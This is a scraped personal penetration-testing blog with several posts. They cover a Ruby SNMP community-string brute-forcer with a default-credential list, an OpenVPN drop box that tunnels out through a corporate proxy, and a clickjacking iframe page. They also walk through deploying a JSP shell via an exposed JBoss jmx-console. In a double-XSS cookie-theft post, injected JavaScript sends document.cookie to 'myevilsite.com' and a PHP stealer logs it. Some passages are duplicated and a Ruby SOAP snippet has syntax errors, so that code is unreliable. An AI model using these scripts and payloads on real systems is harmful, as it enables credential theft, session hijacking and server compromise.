#!/usr/bin/env ruby
require 'snmp'
unless ARGV[0]
puts "Please supply a file containing the target hosts"
exit
end
hosts = IO.readlines(ARGV[0])
comm_strings = ["public","private","0","0392a0","1234","2read","4changes","ANYCOM","Admin","C0de","CISCO","CR52401","IBM","ILMI","Intermec","NoGaH$@!","OrigEquipMfr","PRIVATE","PUBLIC","Private","Public","SECRET","SECURITY","SNMP","SNMP_trap","SUN","SWITCH","SYSTEM","Secret","Security","Switch","System","TENmanUFactOryPOWER","TEST","access","adm","admin","agent","agent_steal","all","all private","all public","apc","bintec","blue","c","cable-d","canon_admin","cc","cisco","community","core","debug","default","dilbert","enable","field","field-service","freekevin","fubar","guest","hello","hp_admin","ibm","ilmi","intermec","internal","l2","l3","manager","mngt","monitor","netman","network","none","openview","pass","password","pr1v4t3","proxy","publ1c","read","read-only","read-write","readwrite","red","regional","rmon","rmon_admin","ro","root","router","rw","rwa","san-fran","sanfran","scotty","secret","security","seri","snmp","snmpd","snmptrap","solaris","sun","superuser","switch","system","tech","test","test2","tiv0li","tivoli","trap","world","write","xyzzy","yellow"]
mib = ""
hosts.each do |host|
mib = ""
comm_strings.each do |comm|
break if mib != ""
SNMP::Manager.open(:Host => "#{host}", :community => "#{comm}", :retries => 0, :timeout => 1) do |manager|
begin
mib = manager.get_value("sysDescr.0")
puts "Detected community string: '#{comm}' with host: #{host}"
rescue Exception => msg
#puts msg
end
end
end
end
Sunday, August 4, 2013
A simple SNMP scanner in ruby
Monday, May 6, 2013
Pen Testing Drop Box using OpenVpn in a restricted environment
Recently I had to perform a penetration test using a vmware box located at the customer's premises in US and accessing it remotely from Europe making use of OpenVpn and my standard pentesting laptop.
The objective of this post is to describe the OpenVpn configuration I used to connect to the box through the corporate proxy.
I am not going into details on howto setup a OpenVpn server as there are plenty of tutorials. Mine is using PKI and TLS.
Additionally the drop box I used is a Kali linux.
First and foremost the customer did not provide me with any details on the environment and deemed no VPN acces was possible. Well he was wrong....
The only possible access to the internet was through the corporate proxy and a proxy pac file.
First action was to download the pac file and understand which was the right proxy to use. You can normally look for a directive like:
You should then consider that most of the proxies won't accept connection to port and protocol different from 443 and TCP.
So here you go with the OpenVpn client configuration.
client.conf
And here it is the server's configuration.
server.conf
Finally to assign the drop box a static IP, in /etc/openvpn/ccd create a file called client (should have the same name used for the certificate pub and private keys ex: john.crt and john.key)
Connect both clients (your pentesting box and the remote vmware) to the OpenVpn server using:
Final step is to move all your files to /etc/openvpn/ and, to make OpenVpn start at boot on your drop box, issue:
The objective of this post is to describe the OpenVpn configuration I used to connect to the box through the corporate proxy.
I am not going into details on howto setup a OpenVpn server as there are plenty of tutorials. Mine is using PKI and TLS.
Additionally the drop box I used is a Kali linux.
First and foremost the customer did not provide me with any details on the environment and deemed no VPN acces was possible. Well he was wrong....
The only possible access to the internet was through the corporate proxy and a proxy pac file.
First action was to download the pac file and understand which was the right proxy to use. You can normally look for a directive like:
return "PROXY 1.2.3.4:8080"
You should then consider that most of the proxies won't accept connection to port and protocol different from 443 and TCP.
So here you go with the OpenVpn client configuration.
client.conf
client
dev tun
proto tcp
remote <OpenVpn Server public address> 443
http-proxy <hostname/IP address of Proxy found in proxy pac file> <Proxy Port(ex. 8080)>
http-proxy-option AGENT Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-GB;+rv:1.7.6)+Gecko/20050226+Firefox/1.0.1
resolv-retry infinite
nobind
user nobody
group nogroup
persist-key
persist-tun
mute-replay-warnings
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
tls-auth tlsauth.key 1
cipher BF-CBC
comp-lzo
verb 3
mute 20
And here it is the server's configuration.
server.conf
local <OpenVpn Server public address>
port 443
proto tcp
dev tun
ca 2.0/keys/ca.crt
cert 2.0/keys/server.crt
key 2.0/keys/server.key # This file should be kept secret
dh 2.0/keys/dh1024.pem
tls-auth 2.0/keys/tlsauth.key 0
server 10.66.77.0 255.255.255.0
ifconfig-pool-persist ipp.txt
client-config-dir /etc/openvpn/ccd #we will assign the dropbox a static IP address see below
keepalive 10 120
cipher BF-CBC # Blowfish (default)
comp-lzo
max-clients 3
client-to-client #Very important setting so you can ssh to the dropbox from your pentesting laptop which will be connected to the same OpenVpn server
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
mute 20
Finally to assign the drop box a static IP, in /etc/openvpn/ccd create a file called client (should have the same name used for the certificate pub and private keys ex: john.crt and john.key)
$cat client
ifconfig-push 10.66.77.9 10.66.77.10
Connect both clients (your pentesting box and the remote vmware) to the OpenVpn server using:
openvpn --config /etc/openvpn/client.conf openvpn-client --verb 4If all goes well you should be able to ping each other's clients.
Final step is to move all your files to /etc/openvpn/ and, to make OpenVpn start at boot on your drop box, issue:
sudo update-rc.d openvpn enable
Monday, April 8, 2013
Framable Web Page
Just a quick post to show you the code which can be used to frame a page inside your domain.
1: <html>
2: <HEAD></HEAD>
3: <body>
4: <style>
5: iframe{
6: filter:alpha(opacity=0.2);opacity: 0.2;
7: position: absolute;top: 0px;left: 0px;
8: height: 500px;width: 600px;
9: }
10: img{
11: position: absolute;top: 0px;left: 0px;
12: height: 640px;width: 640px;
13: }
14: </style>
15: <img src="bushido.jpg">
16: <iframe src="https://victim.com"></iframe>
17: </body>
18: </html>
You just need to adjust the opacity to make the victim's domain more or less visible.
Wednesday, March 14, 2012
Exporting MSF database content into CSV format
Hello everyone.
So you have imported nmap scans into metasploit and created a workspace for every vlan in scope and suddenly the client ask you to give him all nmap scans in CSV format.
If that is the case then this post is for you.
I assume that you have installed postgres on your system and correctly configured it to be used by metasploit. I also assume the name of the database used by metasploit is msf_database. This value can be found within the database.yml file in your framework-x.x.x/config directory.
So let's start then.
The following commands are all you need to export addresses, ports and services from workspace whose id equals 2.
Where the content of msf_in.txt is:
sudo su su postgres psql -d msf_database -f /tmp/msf_in.txt -o /tmp/msf_out.txt cat /tmp/msf_out.txt | tr "|" ";" | cut -d ";" -f "2-4" > myfile.csv
Where the content of msf_in.txt is:
select workspaces.name, hosts.address, services.port,services.name from (services join hosts on services.host_id=hosts.id)join workspaces on hosts.workspace_id=workspaces.id where workspaces.id=2;
Friday, June 25, 2010
The curious case of JBoss Hacking
Hi everyone.
Today I'd like to talk about the Hacking of Jboss.
There are lots of resources on the net about it but maybe reading this article will hopefully help you when you come to a dead end because the configuration is not so standard.
The prerequisite is that you have access to the jmx-console as admin.
It is not so rare seeing jboss where the jmx-console is not password protected.
Well now what...
You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf ....the victim machine cannot connect to my web server on any port (no reverse, only bind allowed)
There is a workaround as described in this very detailed and nice paper:
http://www.redteam-pentesting.de/publications/jboss (Read it before going further on)
The technique described is about using another jboss class called: DeploymentFileRepository
at:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository
and its very useful store() function.
but sometimes thing go wrong anyway when you realize that after posting your jsp code, it doesn't get deployed by Jboss.
This is due to the fact that path where your, say shell.war, dir resides is not in the list of the deploymentscanner url and so the hot deployment fails
The solution is to verify where is your directory by inducing the server to an error:
Function description:
void store()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)
Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true
Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true
Next check the following line:
java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)
The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we have only to use the addURL() function of the deploymentscanner class.
So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Function description:
void addURL()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
The url to input in the form relative to addURL() function is:
file:/prd/jboss/bws/web/bws106/deploy/management/
Note the trailing slash.
Now call your shell by loading the following url:
http://host:8080/shell/shell.jsp
Bye for now...
Today I'd like to talk about the Hacking of Jboss.
There are lots of resources on the net about it but maybe reading this article will hopefully help you when you come to a dead end because the configuration is not so standard.
The prerequisite is that you have access to the jmx-console as admin.
It is not so rare seeing jboss where the jmx-console is not password protected.
Well now what...
You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf ....the victim machine cannot connect to my web server on any port (no reverse, only bind allowed)
There is a workaround as described in this very detailed and nice paper:
http://www.redteam-pentesting.de/publications/jboss (Read it before going further on)
The technique described is about using another jboss class called: DeploymentFileRepository
at:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository
and its very useful store() function.
but sometimes thing go wrong anyway when you realize that after posting your jsp code, it doesn't get deployed by Jboss.
This is due to the fact that path where your, say shell.war, dir resides is not in the list of the deploymentscanner url and so the hot deployment fails
The solution is to verify where is your directory by inducing the server to an error:
Function description:
void store()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)
Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 =
p5 = true
Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true
Next check the following line:
java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)
The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we have only to use the addURL() function of the deploymentscanner class.
So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Function description:
void addURL()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
The url to input in the form relative to addURL() function is:
file:/prd/jboss/bws/web/bws106/deploy/management/
Note the trailing slash.
Now call your shell by loading the following url:
http://host:8080/shell/shell.jsp
Bye for now...
Tuesday, February 9, 2010
Ruby SOAP client with basic authentication and client certificate
During these days I had the need to do a pentest to a web service but since wsfuzzer wasn't working correctly I had to write my own ruby soap client that was able to connect to a ssl protected web service with client certificate and basic authentication.
After many hours spent looking for the suitable library, I've decided to use savon with ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert 1 p12 certificate into 2 pem:
and issue the command:
(you gotta provide the password of your private key)
After many hours spent looking for the suitable library, I've decided to use savon with ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert 1 p12 certificate into 2 pem:
openssl pkcs12 -in global.p12 -out global.pem
Then we cut the private key part from global pem and copy it into protected_key.pem
and issue the command:
(you gotta provide the password of your private key)
mv global.pem cert.pem
openssl rsa -in protected_key.pem -out key.pem
The we can finally write the ruby code:
require 'rubygems'
require 'savon'
client = Savon::Client.new "https://example.com/services?wsdl"
client.request.http.ssl_client_auth(
:cert = OpenSSL::X509::Certificate.new(File.read("cert.pem")),
:key = OpenSSL::PKey::RSA.new(File.read("key.pem")),
:key = OpenSSL::PKey::RSA.new(File.read("key.pem")),
:verify_mode => OpenSSL::SSL::VERIFY_NONE
)
#BASIC AUTHENTICATION
client.request.basic_auth "User", "Password"
puts client.wsdl.soap_actions
#puts client.wsdl.namespace_uri
#don't forget @inorder otherwise the client will send you key values in a different sequence
different from #the one you wrote down
response = client.add_customer do |soap|
soap.body = {
:id =111,
:tel =1233,
:issuer =asder,
:payment_mode =1,
:alias =asd,
:@inorder = [:id, :tel, :issuer, :payment_mode, :alias]
}
end
puts response.to_xml
Finally you have to add some permutation to your values to make it a real soap fuzzer.
You can start by getting the file all_attacks.txt used by from WSFuzzer
Monday, January 25, 2010
How to steal cross domain cookies via double XSS
During a pentest to a big company using SSO (single-sign-on) system I found a stored xss
in one of their site, call it "a.com". This site unfortunately doesn't partecipate in the SSO login system,
so I had to devise a way to use it to steal the cookies from one of the SSO domains.
After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe
in a.com that as a source was calling the vulnerable "b.com" url that in turn was loading an image that as a source was calling
my server I managed to steal sso authenticated cookies.
Let's see some code:
(the code is taking advantage of jquery.js since it was originally loaded by a.com)
The following code is an external js injected in the stored xss vulnerable parameter in "a.com"
$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');
el.style.visibility="hidden";
document.body.appendChild(el);
url="http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
el.setAttribute('src', url);
});
where ex.js is:
var Image = document.createElement("img");
Image.setAttribute("width","30");
Image.src="http://myevilsite.com/Cookie_Stealer/stealer.php?c="+encodeURI(document.cookie)+"&location="+document.location;
and stealer.php code is:
<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>
Finally by visiting a.com while being logged to any of the SSO domains causes your credentials being sent to my server
Subscribe to:
Posts (Atom)